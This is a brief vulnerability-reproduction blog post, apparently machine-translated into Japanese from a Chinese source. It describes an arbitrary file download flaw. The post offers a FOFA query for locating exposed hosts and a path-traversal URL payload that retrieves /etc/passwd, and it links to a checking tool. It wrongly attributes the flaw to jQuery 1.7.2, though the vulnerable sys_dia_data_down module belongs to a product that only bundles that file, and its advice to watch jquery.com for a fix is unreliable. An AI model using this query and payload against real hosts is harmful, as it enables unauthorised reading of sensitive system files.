【脆弱性再発】jQuery-1.7.2版任意ファイルダウンロードで脆弱性再発


序文

jQuery-1.7.2 には任意のファイル読み取りの脆弱性があり、攻撃者は特定の URL アドレスを介して機密情報にアクセスして取得することができます。


声明

この記事は、脆弱性の再現と技術調査のみを目的としています. 不正な侵入攻撃に攻撃方法を使用しないでください. 結果は、この記事の著者とは何の関係もありません, 覚えておいてください! ! !

1.jQueryの紹介

jQuery は高速で簡潔な JavaScript フレームワークです. 2006 年 1 月に John Resig によってリリースされた Prototype に続く優れた JavaScript コード ライブラリ (フレームワーク) です.

jQuery 設計の目的は、「write Less, Do More」であり、これは、より少ないコードを記述し、より多くのことを行うことを提唱しています。JavaScript で一般的に使用される機能コードをカプセル化し、シンプルな JavaScript デザイン パターンを提供し、HTML ドキュメントの操作、時間処理、アニメーション デザイン、および Ajax インタラクションを最適化します。


2. 脆弱性の説明

jQuery は、豊富な Javascript コード ベースを備えた高速で簡潔な JavaScript フレームワークです. jQuery のバージョン1.7.2sys_dia_data_downモジュールには、任意のファイルを読み取る脆弱性があります. 攻撃者は、フォアグラウンドを介して任意のファイルを読み取ることができます.


3. 脆弱性の再発

FOFA: body="webui/js/jquerylib/jquery-1.7.2.min.js"

ペイロード:http://127.0.0.1/webui/?g=sys_dia_data_down&file_name=../../../../../etc/passwd
機密ファイルをダウンロードするにはリンクにアクセスしてください
ここに画像の説明を挿入
ここに画像の説明を挿入
検証ツールのダウンロード:ダウンロードに移動します

4. 是正のための提案

製造元はまだバグ修正ソリューションを提供していません。タイムリーな更新については、製造元のホームページに注意してください。https://jquery.com/

おすすめ

転載: blog.csdn.net/weixin_46944519/article/details/130399101